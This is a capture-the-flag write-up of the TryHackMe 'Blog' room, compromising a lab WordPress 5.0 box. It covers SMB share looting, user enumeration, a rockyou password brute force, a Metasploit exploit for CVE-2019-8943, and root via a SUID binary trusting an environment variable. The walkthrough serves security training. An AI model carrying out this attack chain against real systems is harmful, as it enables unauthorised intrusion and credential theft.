Contents

Blog

Updated on 2020-07-12

Billy Joel made a Wordpress blog!

Difficulty: Medium

Room: Blog

Created by: Nameless0ne

The first thing we want to do is add the machine’s IP and hostname to blog.thm to /etc/hosts.

nmap -p- -T4 -sC -sV -vvv -oA nmap/scan $IP

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
🚀 nmap -p- -T4 -sC -sV -vvv -oA nmap/scan $IP
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3hfvTN6e0P9PLtkjW4dy+6vpFSh1PwKRZrML7ArPzhx1yVxBP7kxeIt3lX/qJWpxyhlsQwoLx8KDYdpOZlX5Br1PskO6H66P+AwPMYwooSq24qC/Gxg4NX9MsH/lzoKnrgLDUaAqGS5ugLw6biXITEVbxrjBNdvrT1uFR9sq+Yuc1JbkF8dxMF51tiQF35g0Nqo+UhjmJJg73S/VI9oQtYzd2GnQC8uQxE8Vf4lZpo6ZkvTDQ7om3t/cvsnNCgwX28/TRcJ53unRPmos13iwIcuvtfKlrP5qIY75YvU4U9nmy3+tjqfB1e5CESMxKjKesH0IJTRhEjAyxjQ1HUINP
|   256 c2:64:ef🆎b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJtovk1nbfTPnc/1GUqCcdh8XLsFpDxKYJd96BdYGPjEEdZGPKXv5uHnseNe1SzvLZBoYz7KNpPVQ8uShudDnOI=
|   256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICfVpt7khg8YIghnTYjU1VgqdsCRVz7f1Mi4o4Z45df8
80/tcp  open  http        syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 3s
| nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BLOG<00>             Flags: <unique><active>
|   BLOG<03>             Flags: <unique><active>
|   BLOG<20>             Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 33922/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 35876/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 9200/udp): CLEAN (Failed to receive data)
|   Check 4 (port 23163/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: blog
|   NetBIOS computer name: BLOG\x00
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2020-07-11T20:02:25+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-11T20:02:25
|_  start_date: N/A

The inital scan shows 22,80,139,and 445 open. We can safely assume we’re dealing with WordPress given the room icon. Since SMB is open we’ll start there to see if any shares that are configured for guest read or read write.


1
smbmap -H $IP

Nice! We reveal guest access to the BillySMB share from using smbmap.

/images/blog/smbmap1.png

Now let’s recursively download everything in BillySMB with smbget. Typically I like to use smbget to exfiltrate files from SMB shares but feel free to use smbmap or smbclient.

1
smbget -R smb://$IP/BillySMB/

/images/blog/smbget.png

Tip: If this were an FTP share you could use wget to recursively download files. wget -r --no-passive ftp://(USERNAME):(PASSWORD)@(TARGET)


Hey, there’s a file name that looks familiar. It’s from NinjaJc01’s box Wonderland. Could this be a hint to not jump in the rabbit hole?

Going right in for the inevitable steganography with steghide.

1
steghide extract -sf Alice-White-Rabbit.jpg 
/images/blog/steg1.png

Contents of rabbit_hole.txt

/images/blog/steg2.png

I looked at the contents and started to get the hint… I’ll leave it to you to check out tswift.mp4 and check-this.png 😄️


Looks like we’re dealing with a standard barebones WordPress instance. We’ll see what wpscan can enumerate for us but first let’s poke around a bit. From the two public posts we see Billy’s mom is a user and hovering over ‘By Karen Wheeler’ we see her username is kwheel.

/images/blog/wp1.png

Scrolling down we can see a post from Billy with a username of bjoel. Let’s save the two usernames in a text file called usernames.txt that we’ll eventually use to brute force.

/images/blog/wp2.png
1
2
echo "kwheel
bjoel" > usernames.txt

Hit enter after "kwheel.

/images/blog/usernames.png

WPScan including username enumeration

wpscan --url http://blog.thm/ -e u

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
wpscan --url http://blog.thm/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blog.thm/ [10.10.247.110]
[+] Started: Sat Jul 11 17:01:00 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://blog.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://blog.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blog.thm/feed/, <generator>https://wordpress.org/?v=5.0</generator>
 |  - http://blog.thm/comments/feed/, <generator>https://wordpress.org/?v=5.0</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://blog.thm/wp-content/themes/twentytwenty/
 | Last Updated: 2020-06-10T00:00:00.000Z
 | Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <===============================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] kwheel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bjoel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[+] Billy Joel
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sat Jul 11 17:01:07 2020
[+] Requests Done: 24
[+] Cached Requests: 35
[+] Data Sent: 6.151 KB
[+] Data Received: 154.571 KB
[+] Memory used: 202.531 MB
[+] Elapsed time: 00:00:06

From the scan we confirm the two usernames we found earlier. We also now know XML-RPC is enabled so we can leverage that for brute forcing.

Also, we see this is WordPress version 5.0 which has a Path Traversal and Local File Inclusion vulnerability that could lead to an authenticated RCE vulnerability (CVE 2019-8943).

CVE 2019-8943 description:

WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.

Mitre

ExploitDB

I went a little too aggressive with scanning when I was doing this box and managed to make Apache hate me. I forgot I kicked off ffuf after adding the hostname to /etc/hosts out of habit and forgot about it. After resetting the box three times it finally hit me. Don’t be like me. 😄️

1
wpscan --url http://blog.thm -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75

We now have kwheel’s WordPress password. Spoiler alert: you won’t be able to brute force Billy’s password with rock you.

/images/blog/kwheel.png

I decided to use a metasploit module for the foothold. If you are not familiar with Metasploit then I highly recommend THM’s Metasploit red team primer room here: Metasploit by DarkStar7471.

msfconsole -q

Let’s use searchsploit to find modules for WordPress core 5.0

/images/blog/ss.png

Search for ‘crop-image’

/images/blog/search.png

use 0

/images/blog/use0.png

options. A php meterpreter payload worked for me but feel free to use something else. Also, don’t forget the password!

/images/blog/options.png

run -j.. or run.. or exploit.. or exploit -j.. do you.

/images/blog/m1.png
1
2
3
sessions -i 1
shell
script -qc /bin/bash /dev/null
/images/blog/shell.png

Looking for user.txt with find / -xdev -type f -name user.txt 2>/dev/null I can see there’s a file named user.txt in /home/bjoel/ but after reading the file it’s not the real user flag.

1
2
3
4
cat /home/bjoel/user.txt
You won't find what you're looking for here.

TRY HARDER

Looking in /home/bjoel we can see a pdf Billy has saved regarding his termination. Let’s download it and take a look.

/images/blog/download.png

Looking at the pdf we can see Billy was fired from Rubber Ducky Inc. Hmm… looks like it could be a hint that references the Hak5 product USB Rubber Ducky. Looking in /media we can see a usb directory. We’ll find out later that’s where the flag is. I wasn’t able to find a way to retrieve this flag without rooting the box first.

/images/blog/termination.png

At this point I uploaded and ran linpeas as usual, did some manual enumeration, connected to the database with the creds found in wp-config.php, etc. Looking at SUID scan output from linpeas we spot an odd binary in /usr/sbin named checker.

A manual method to find SUIDs and SGIDs find / -xdev -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

-rwsr-sr-x 1 root root 8432 May 26 18:27 /usr/sbin/checker

Running checker we get a message returned “Not an Admin”.

/images/blog/download.png

Running strings against the binary we can see some interesting things and seems like there’s a system call.

  • setuid
  • puts
  • getenv
  • system
  • /bin/bash

Decompiling main in ghidra gives an understanding of what the binary does. It’s making a call to getenv to check if an admin environment variable is declared. If admin is declared then it will set the uid to 0 (root user) and make a system call to spawn /bin/bash.

/images/blog/main.png

So now all we’ll have to do is export admin=briskets then rerun checker to get a root shell.

Note: It doesn’t matter what you set admin as it’s just checking for the environment variable.

/media/usb/user.txt

This was a fun room from Nameless0ne and I can see this being an enjoyable room for people at all skill levels. I always enjoy a room involving WordPress for some reason. Anyways, if you have any questions feel free to @ me in the THM discord.

Thanks for the room Nameless0ne!